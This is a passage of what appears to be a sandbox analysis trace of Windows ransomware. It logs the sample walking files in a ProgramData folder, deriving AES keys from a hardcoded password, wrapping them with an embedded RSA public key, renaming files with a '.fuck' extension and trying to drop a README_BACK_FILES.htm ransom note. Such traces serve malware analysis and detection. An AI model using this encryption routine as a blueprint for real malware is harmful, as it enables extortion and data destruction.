pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0236.616] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0236.616] CloseHandle (hObject=0xffffffff) returned 1 [0236.616] CloseHandle (hObject=0xffffffff) returned 1 [0236.616] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), bFailIfExists=0) returned 0 [0236.616] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x0) returned 0 [0236.616] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg")) returned 0 [0236.617] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.fuck")) returned 0 [0236.617] CryptDestroyHash (hHash=0x2816e98) returned 1 [0236.617] CryptDestroyKey (hKey=0x2817058) returned 1 [0236.617] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.617] FindNextFileA (in: hFindFile=0x2816fd8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0236.617] FindClose (in: hFindFile=0x2816fd8 | out: hFindFile=0x2816fd8) returned 1 [0236.617] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\readme_back_files.htm")) returned 0xffffffff [0236.618] AreFileApisANSI () returned 1 [0236.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0236.618] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.618] GetLastError () returned 0x5 [0236.618] GetLastError () returned 0x5 [0236.618] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.618] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.618] GetLastError () returned 0x5 [0236.618] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico")) returned 0x20 [0236.619] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x80) returned 0 [0236.619] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.620] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.620] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.620] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.625] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.625] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.625] CryptHashData (hHash=0x28171d8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.625] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x28171d8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2816fd8) returned 1 [0236.625] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.625] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.625] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815c38) returned 1 [0236.627] CryptImportPublicKeyInfo (in: hCryptProv=0x2815c38, dwCertEncodingType=0x1, pInfo=0x2808e50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2808e80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2808e88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817418) returned 1 [0236.627] CryptEncrypt (in: hKey=0x2817418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.627] CryptEncrypt (in: hKey=0x2817418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815770*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815770*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.627] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815770, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.627] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.627] CryptEncrypt (in: hKey=0x2816fd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.627] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.627] CloseHandle (hObject=0xffffffff) returned 1 [0236.627] CloseHandle (hObject=0xffffffff) returned 1 [0236.628] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), bFailIfExists=0) returned 0 [0236.628] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x0) returned 0 [0236.628] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg")) returned 0 [0236.628] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.fuck")) returned 0 [0236.629] CryptDestroyHash (hHash=0x28171d8) returned 1 [0236.629] CryptDestroyKey (hKey=0x2816fd8) returned 1 [0236.629] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.629] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.629] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.629] GetLastError () returned 0x5 [0236.629] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico")) returned 0x20 [0236.629] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x80) returned 0 [0236.630] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.630] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.630] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.630] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.638] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.638] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.638] CryptHashData (hHash=0x2817298, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.638] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2816e98) returned 1 [0236.638] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.638] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.638] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815aa0) returned 1 [0236.639] CryptImportPublicKeyInfo (in: hCryptProv=0x2815aa0, dwCertEncodingType=0x1, pInfo=0x280a100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a130*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a138*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816fd8) returned 1 [0236.639] CryptEncrypt (in: hKey=0x2816fd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.639] CryptEncrypt (in: hKey=0x2816fd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815908*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815908*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.640] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815908, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.640] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.640] CryptEncrypt (in: hKey=0x2816e98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.640] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.640] CloseHandle (hObject=0xffffffff) returned 1 [0236.640] CloseHandle (hObject=0xffffffff) returned 1 [0236.640] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), bFailIfExists=0) returned 0 [0236.640] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x0) returned 0 [0236.641] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg")) returned 0 [0236.641] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.fuck")) returned 0 [0236.641] CryptDestroyHash (hHash=0x2817298) returned 1 [0236.641] CryptDestroyKey (hKey=0x2816e98) returned 1 [0236.641] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.641] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.641] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.641] GetLastError () returned 0x5 [0236.641] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico")) returned 0x20 [0236.641] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x80) returned 0 [0236.642] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.642] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.642] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.642] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.646] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.646] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.646] CryptHashData (hHash=0x2817018, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.646] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817118) returned 1 [0236.646] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.646] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.646] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815b28) returned 1 [0236.647] CryptImportPublicKeyInfo (in: hCryptProv=0x2815b28, dwCertEncodingType=0x1, pInfo=0x28090c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28090f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28090f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817158) returned 1 [0236.647] CryptEncrypt (in: hKey=0x2817158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.647] CryptEncrypt (in: hKey=0x2817158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815000*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815000*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.648] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815000, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.648] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.648] CryptEncrypt (in: hKey=0x2817118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.648] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.648] CloseHandle (hObject=0xffffffff) returned 1 [0236.648] CloseHandle (hObject=0xffffffff) returned 1 [0236.648] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), bFailIfExists=0) returned 0 [0236.648] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x0) returned 0 [0236.648] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg")) returned 0 [0236.649] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.fuck")) returned 0 [0236.649] CryptDestroyHash (hHash=0x2817018) returned 1 [0236.649] CryptDestroyKey (hKey=0x2817118) returned 1 [0236.649] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.649] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.649] 